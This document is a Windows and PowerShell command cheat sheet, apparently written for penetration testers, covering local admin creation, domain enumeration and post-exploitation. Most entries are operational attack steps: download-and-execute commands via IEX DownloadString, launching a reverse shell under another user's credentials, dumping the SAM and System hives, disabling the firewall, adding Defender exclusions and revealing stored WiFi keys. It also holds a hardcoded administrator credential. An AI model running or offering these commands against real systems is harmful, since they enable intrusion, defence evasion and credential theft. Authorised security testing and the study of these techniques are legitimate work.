Table of content

Create and admin user

Create the user and add it to the Administrator group

net user username password /add
net localgroup Administrators nom_user /add

Run as domain user

Run a powershell as a domain user

runas /netonly /user:DOMAIN@USER 'powershell.exe –Exec Bypass'
  • /netonly: network connection will be performed using the domain user profile

Copy a full directory

Copy a full directory and its subdirectory

xcopy.exe /s source_absolute_path dest_absolute_path

Check hives rights

Use Sysinternals binary accesschk.exe to check the hive ACL

accesschk.exe /accepteula -qusk "Users" HKLM\SOFTWARE\....

Display wifi passwords

Display a wifi password knowing its SSID

netsh wlan show profiles
netsh wlan show profile name="NETWORK" key=clear | Select-String 'Key Content'

Download file

Invoke-WebRequest -Uri ${url} -OutFile ${outFile}

Run as another user

Run executable as an other user. Usefull to launch reverse shell with another user privilege.

$secpasswd = ConvertTo-SecureString ${password} -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential (${username}, $secpasswd)
$computer = "${hostname}"
[System.Diagnostics.Process]::Start(${reverseShellPath},"", $mycreds.Username, $mycreds.Password, $computer)
$username = "BART\Administrator"
$password = "3130438f31186fbaf962f407711faddb"
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr

Invoke-Command -ScriptBlock { XXXXXX } -Credential $cred -Computer localhost

Use system proxy

Use the configured system proxy to perform requests

(New-Object System.Net.WebClient).Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

IEX downloadstring

Download remote powershell script and execute it from memory

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('${URI}/file.ps1')

Set environment variable

Set the value of an environment variable.

Set-Content -Path Env:${EnvVar} -Value ${NewValue}

Add exclusion folder to WinDefender

Add a no-scan directory to WinDefender

Set-MpPreference -ExclusionPath "C:\Temp"

Disable firewall

Fully disable the firewall

netsh advfirewall set allprofiles state off

Dump SAM

Save the SAM and the System hive

reg save HKLM\SAM ./SAM.save
reg save HKLM\System ./System.save

Activate RDP

Enable and authorize RDP connections

# Allow RDP connexions
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -Value 0

# Enable network pre-authentication (allows creds c/c)
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -Value 1

# Allow RDP flux through the firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

List RDP connection on a machine

List the users having an RDP connection on the targeted machine

$DSC = (New-Object System.Management.Automation.PSCredential("${domain}\${user}", (ConvertTo-SecureString "${password}" -AsPlainText -Force)))
invoke-command {qwinsta} -ComputerName ${ip} -Credential $DSC

Kill process by name

Kill all process with a specific name

taskkill /IM ${processName} /F

Scheduled task

# Define the task
# Change the /sc and /mo to reach you time need
schtasks /create /sc hourly /mo 1 /tn "${taskname}" /tr "${command}"

# Force the task execution
schtasks /run /tn "${taskname}"

Domain Information

Get password policy

Get-DomainPolicyData | select -ExpandProperty SystemAccess

Get dommain user information

Get-DomainUser -Identity nlamb

Get computer information

Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName

# Enumerate machine where a specific domain user or group is member of a specific group
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName

Get Organization Unit

Get-DomainOU -Properties Name | sort -Property Name

Get group information

Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName


Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
Get-DomainGPO -ComputerIdentity ${ComputerName} -Properties DisplayName | sort -Property

# GPO modifying local group membership
Get-DomainGPOLocalGroup | select GPODisplayName, GroupName

Get Session information

Get information of the session open on the local (or remote) machine. CName is the source of the connection.

Get-NetSession -ComputerName ${computerName} | select CName, UserName

Proxy Aware

$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

results matching ""

    No results matching ""

    results matching ""

      No results matching ""